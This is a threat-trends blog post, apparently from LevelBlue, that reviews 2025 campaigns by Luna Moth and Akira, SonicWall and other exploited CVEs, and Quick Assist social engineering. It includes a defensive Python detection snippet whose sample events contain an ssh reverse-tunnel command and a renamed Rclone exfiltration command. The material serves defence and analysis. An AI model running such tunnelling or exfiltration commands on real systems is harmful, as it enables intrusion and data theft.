A 2025 Threat Trends Analysis
The article analyzes 2025 cybersecurity trends, focusing on how threat groups such as Luna Moth and Akira used social engineering, phishing, and vulnerabilities (such as SonicWall CVE-2024-40766) for data theft, ransomware deployment, and network intrusion. 2025-12-22 15:0:3 Author: levelblue.com


As 2025 winds down and cruises into the holiday season, it’s a good time to take a look back and reflect on what took place in the cybersecurity industry. The members of this community know that while every year is not the same, there are trends that tend to stick with us from year to year, making it important to remember what happened so we are ready for what will take place in the coming months.

With that noted, Stroz Friedberg, which is now part of LevelBlue, compiled a report noting how in 2025 threat actors utilized sophisticated social engineering techniques and exploited critical vulnerabilities to target organizations across the United States.

We identified a series of coordinated campaigns and trends throughout the year involving threat actor groups such as Luna Moth and Akira.

These groups leveraged a combination of phishing, impersonation, and exploitation of remote access tools and vulnerabilities. Campaigns often began with a convincing social engineering scheme, such as fake IT support calls or an external sender accessing an internal communication channel, resulting in the deployment of remote access tools, malware, and, at times, ransomware.

The most frequently exploited vulnerabilities observed this year involved network devices and VPN gateways, with attackers consistently seeking to bypass authentication and gain persistent access.

In the first half of the year, we observed attackers using increasingly stealthy tactics, such as impersonation, to bypass traditional security measures. Some threat groups paid external individuals to secure IT roles within target organizations, allowing the perpetrators to remain hidden. These evolving strategies often exploited human error and combined multiple techniques.

LevelBlue’s Incident Readiness and Response team observed three major campaigns and trends that disrupted the traditional threat landscape in 2025:

  • The Luna Moth threat actor group used callback phishing campaigns, largely targeting law firms. These campaigns often began with a convincing social engineering scheme, such as fake IT support calls or an external sender accessing an internal communication channel, resulting in the deployment of remote access tools, malware, and, at times, ransomware.
  • The Akira threat actor group exploited the SonicWall vulnerability CVE-2024-40766, an improper access control flaw, as well as CVE-2024-53704, which enables the hijacking of an active VPN session. Akira additionally leveraged Bumblebee malware as an initial access tool through SEO poisoning tactics. The Akira group created a lookalike domain to mimic legitimate IT tools. Victims were redirected to malicious websites and led to install a trojanized installer. Once executed, the installer deployed Bumblebee malware.
  • Threat actors exploited Microsoft Quick Assist in sophisticated social engineering campaigns. These attacks are initiated through voice calls or Microsoft Teams messages from compromised external accounts, prompting the use of Quick Assist and resulting in the compromise of the victim’s systems.

As attackers continue to manipulate human behavior, organizations must prioritize behavioral detection over traditional heuristics to stay ahead of emerging threats.

What Were the Trends of 2025?

Trend 1: Luna Moth

LevelBlue linked the Luna Moth group to numerous incidents of data theft and extortion, specifically targeting professional service organizations such as law firms and financial institutions.

Their approach started with a phishing email that impersonated a member of the company’s internal IT or security team. The threat actor directed victims to call a fake helpdesk number. Once the attacker established contact with the victim, they sent an invitation to use remote access tools such as Zoho Assist or Atera. After the victim granted access to their device, the attacker pivoted to data exfiltration either through WinSCP or a renamed version of Rclone.

Once exfiltration was complete, the Luna Moth group harassed victim organizations by calling or emailing them to pressure them into paying.

LevelBlue’s investigations into Luna Moth incidents demonstrate a consistent pattern in which phishing and IT impersonation led to remote access, data theft, and eventual extortion. With this progression established, we now shift to the next emerging trend, centered around activity linked to an active threat group.

Figure 1: Luna Moth Data Theft & Extortion Attack Chain.


Trend 2: Akira

In 2025, LevelBlue observed Akira affiliates three times as often as the next most-prevalent threat actor. Two distinct trends in Akira activity were identified this year.

SonicWall Vulnerability

LevelBlue’s investigations found that the Akira threat actor group and its affiliates used two vulnerabilities in SonicWall firewalls to gain initial access to organizations’ environments.

CVE-2024-40766 was published in August 2024 and references an improper access control flaw in SonicWall firewall appliances stemming from migrations from sixth- to seventh-generation firewalls, in which local user passwords were carried over and not subsequently reset.

Figure 2. SonicWall vulnerability.

CVE-2024-53704 was published in January 2025. This vulnerability is an authentication bypass affecting the SSL VPN component of SonicWall firewalls running versions 7.1.x, 7.1.2-7019, and 8.0.0-8035.

Device vulnerabilities provided initial access to targeted environments, establishing a reliable foothold for further activity.

Bumblebee Loader

LevelBlue observed spoofed domains utilized to trick victims into installing a malicious version of RVTools. These sites were designed to appear in search engine results, luring unsuspecting users to download malicious software. Once the malicious installer was executed, the Bumblebee malware was deployed. These intrusions escalated quickly from a single infected host, moving laterally across the environment, harvesting credentials, installing persistent remote access tools, and exfiltrating data using SFTP clients.

The attacks concluded with the deployment of Akira ransomware, encrypting critical systems.

In summary, Akira leveraged spoofed domains as the entry point for malicious software that rapidly escalated to malware deployment, lateral movement, data theft, and eventual ransomware execution. Having outlined the progression of the attack, the next section explores a broader trend relevant to social engineering campaigns and data theft.

Figure 3. Bumblebee loader attack chain.


Trend 3: Quick Assist/Teams Call

LevelBlue observed an increase in malicious activity leveraging Microsoft Quick Assist to carry out social engineering campaigns, leading to ransomware detonation.

These attacks typically began with voice calls or Microsoft Teams messages from an external account. In some instances, the threat actor preempted the Teams calls with email bombing, creating a heightened sense of urgency and concern among recipients. The interactions were designed to convince victims that they were receiving technical support from internal IT or security teams.

During the call, the threat actor convinced the victims to launch Quick Assist and share access to their devices. Because Quick Assist runs in the context of the logged-in user, sharing access provided the attacker with the same privileges as the user.

LevelBlue observed subsequent command sequences that collectively demonstrate a methodical approach to post-compromise activity. The initial phase involved extensive reconnaissance, utilizing commands such as tasklist, systeminfo, whoami, net session, nslookup, and ipconfig /all. Threat actors leveraged commands including nltest /dclist and nltest /domain_trusts /all_trusts to enumerate domain controllers and trust relationships, which provided the attackers with valuable insight into organizations’ networks.

LevelBlue also observed the use of the legitimate Windows SSH executable, ssh.exe, with reverse-tunneling flags, which created a covert channel from the compromised host to an external server and bypassed typical inbound firewall restrictions. Download commands utilizing curl.exe were used to retrieve executables, including remote administration tools.

LevelBlue observed numerous persistence mechanisms, including a combination of scheduled task manipulation, registry modifications, and WMI event subscriptions. Attackers used remote access tools such as ScreenConnect and AnyDesk to maintain persistence. File operations were automated using batch scripts that created directories, combined and extracted files, and deleted evidence to evade detection. Threat actors were also observed mapping drives, exfiltrating data, and conducting enumeration through the initial victim host. In at least one instance, the threat actor also deployed Black Basta ransomware using PSExec.
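As an added example (not LevelBlue's code) of the behavioral detection this report argues for, the rules below run over constructed process-creation events modelled on Sysmon fields and flag the Quick Assist post-compromise sequence described above (a burst of reconnaissance utilities, ssh.exe with a reverse-tunnel flag) together with the renamed Rclone from the Luna Moth chain in Trend 1. The event field names, host names and addresses are assumptions.

```python
import re
from collections import defaultdict, namedtuple

# Constructed process record (loosely Sysmon Event ID 1); original_name is the PE
# OriginalFileName, which survives renaming the file on disk.
ProcEvent = namedtuple("ProcEvent", "ts host image original_name cmdline")
# Recon utilities named in the report; a burst of distinct ones is the signal, not one run.
RECON = {"tasklist.exe", "systeminfo.exe", "whoami.exe", "nslookup.exe",
         "ipconfig.exe", "nltest.exe", "net.exe"}

def rule_recon_burst(events, window=120, threshold=4):
    """Hosts that ran >= `threshold` distinct recon utilities within `window` seconds."""
    by_host = defaultdict(list)
    for e in events:
        if e.original_name.lower() in RECON:
            by_host[e.host].append(e)
    hits = set()
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.ts)
        for i, start in enumerate(evs):
            names = {e.original_name.lower() for e in evs[i:] if e.ts - start.ts <= window}
            if len(names) >= threshold:
                hits.add(host)
    return hits

def rule_ssh_reverse_tunnel(e):
    """Built-in ssh.exe launched with -R (remote port forward): the covert-channel pattern."""
    return e.original_name.lower() == "ssh.exe" and re.search(r"(^|\s)-R\s*\d+:", e.cmdline) is not None

def rule_renamed_transfer_tool(e):
    """Rclone or WinSCP whose on-disk file name differs from its PE OriginalFileName."""
    disk = e.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return e.original_name.lower() in {"rclone.exe", "winscp.exe"} and disk != e.original_name.lower()

def detect(events):
    """Return (rule, host) alerts for the whole event set, host-level rules first."""
    per_event = (("ssh_reverse_tunnel", rule_ssh_reverse_tunnel), ("renamed_transfer_tool", rule_renamed_transfer_tool))
    alerts = [("recon_burst", h) for h in sorted(rule_recon_burst(events))]
    return alerts + [(name, e.host) for e in events for name, rule in per_event if rule(e)]

# Constructed sample events; 198.51.100.7 is a documentation-range placeholder address.
SAMPLE = [
    ProcEvent(0, "WS01", r"C:\Windows\System32\whoami.exe", "whoami.exe", "whoami"),
    ProcEvent(10, "WS01", r"C:\Windows\System32\nltest.exe", "nltest.exe", "nltest /domain_trusts /all_trusts"),
    ProcEvent(30, "WS01", r"C:\Windows\System32\systeminfo.exe", "systeminfo.exe", "systeminfo"),
    ProcEvent(40, "WS01", r"C:\Windows\System32\ipconfig.exe", "ipconfig.exe", "ipconfig /all"),
    ProcEvent(60, "WS01", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe", "ssh -N -R 3389:127.0.0.1:3389 u@198.51.100.7"),
    ProcEvent(0, "WS02", r"C:\ProgramData\svchost.exe", "rclone.exe", "svchost.exe copy C:\\Share remote:bucket"),
    ProcEvent(5, "WS02", r"C:\Windows\System32\whoami.exe", "whoami.exe", "whoami"),  # one utility alone: no burst
]
```

Running `detect(SAMPLE)` yields one recon-burst alert for WS01, the ssh reverse tunnel on WS01, and the renamed Rclone on WS02, while the lone whoami on WS02 stays below the burst threshold.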

Figure 4. Teams/Quick Assist attack chain.

Let’s Look at the Most Frequently Exploited Vulnerabilities

From LevelBlue’s observations in the first half of 2025, the most frequently exploited vulnerabilities involved network intermediary devices, specifically firewalls, and secure remote access gateways such as SSL VPNs.

CVE-2024-40766

A critical improper access control vulnerability was identified in SonicWall devices, impacting Gen 5, Gen 6, and older Gen 7 firewalls. This flaw allows unauthorized access to resources and may also cause a firewall crash. While this vulnerability was first disclosed in September 2024, Huntress observed active exploitation of seventh-generation firewalls with SSL VPN enabled around July 2025. This vulnerability allows attackers to gain unauthorized access to networks, bypass MFA, and deploy ransomware, most commonly Akira.

CVE-2024-53704

First published in January 2025, this vulnerability is an authentication bypass that affects the SSL VPN component of SonicWall firewalls versions 7.1.x, 7.1.2-7019, and 8.0.0-8035. This flaw allows attackers to bypass MFA, access private information, and disrupt VPN sessions without authentication.

CVE-2024-55591

This zero-day vulnerability affects FortiOS and FortiProxy. The flaw allows attackers to remotely bypass authentication and gain admin privileges to network devices through crafted Node.js websocket requests.

CVE-2025-0282

Active exploitation of a zero-day vulnerability in Ivanti Connect Secure VPN appliances was observed, likely attributable to UNC5221. This flaw allows unauthenticated remote code execution via a stack-based buffer overflow. LevelBlue noted that attackers exploiting this vulnerability deploy malware such as PHASEJAM and SPAWN to install web shells, persist across the environment, evade detection, harvest credentials, exfiltrate sensitive data, and delete evidence.

CVE-2025-31324

Active exploitation of a critical vulnerability in SAP NetWeaver Visual Composer was first reported in April 2025. The flaw allows attackers to upload and execute arbitrary files on Windows and Linux servers. This vulnerability is associated with Python reverse shells, web shell files, and the download and execution of additional malware (cryptocurrency miners and remote access tools). Attackers use Base64 encoding to obfuscate commands and maintain persistence by uploading malicious JSP files.

This visualization displays the most exploited vulnerabilities throughout 2025, sourced from DFIR investigations conducted by LevelBlue. Percentages represent the proportion of cases in which each vulnerability was identified.

Figure 5. Top 5 exploited vulnerabilities, 2025.

Malware

The graph below illustrates the top ten most frequently observed malware families in 2025, derived from DFIR engagements conducted by LevelBlue. Percentages denote each malware family’s representation across all cases.

Figure 6. Top malware, 2025.

Threat Actors

This graph represents the top ten most active threat actors observed year-to-date in 2025. The data is derived from DFIR investigations conducted by LevelBlue and reflects the percentage of cases in which each threat actor was identified.

Figure 7. Top threat actors, 2025.

Techniques Observed

LevelBlue observed the following techniques across multiple trends described above.

Techniques Observed Across Campaigns, 2025

  • T1021.004 SSH
  • T1046 Network Service Discovery
  • T1059.001 PowerShell
  • T1071.001 Web Protocols
  • T1105 Ingress Tool Transfer
  • T1136.002 Domain Account
  • T1219 Remote Access Software
  • T1560.001 Archive via Utility
  • T1562.001 Disable/Modify EDR/AV

Tools

LevelBlue observed an increase in living off the land techniques and social engineering, providing a simpler attack vector. Attackers abused legitimate tools already present in the environment, thereby lowering the chance of being detected by traditional Endpoint Detection and Response (EDR) tools.

This graph represents the top 20 tools observed in 2025 year-to-date. The data is derived from DFIR investigations conducted by LevelBlue and reflects the percentage of cases in which each tool was identified.

Figure 8. Top tools, 2025.

Most Observed Tools by Type:

File Transfer / Synchronization

  • Rclone
  • WinSCP
  • FileZilla

Remote Access / Support

  • Quick Assist
  • AnyDesk
  • Zoho Assist
  • ConnectWise

Network Scanning / Management

  • SoftPerfect Network Scanner
  • Advanced IP Scanner
  • Nmap

Command-line / Scripting / Utilities

  • PsExec
  • OpenSSH
  • curl
  • cmd
  • Net
  • quser
  • Nltest
  • netstat

Compression / Archiving

  • 7-Zip
  • WinRAR

Security / Penetration Testing

  • Mimikatz
  • Impacket

Software / Productivity

  • Microsoft Office Outlook Desktop
  • Outlook Desktop for Mac
  • eM Client
  • PerfectData Software

Time to Look Ahead

Recent months saw a rise in sophisticated social engineering campaigns, with attackers adopting increasingly stealthy tactics. While traditional threats such as phishing and vulnerability exploitation persist, attackers increasingly rely on impersonation to achieve their goals.

These attacks successfully exploited human error and bypassed technical defenses, suggesting that future trends will see attackers continuing to focus on manipulating human behavior to accomplish their objectives. Placing greater emphasis on focused behavioral detection rather than heuristics is necessary to remain vigilant and ahead of threat actors.


Source: https://levelblue.com/blogs/spiderlabs-blog/a-2025-threat-trends-analysis/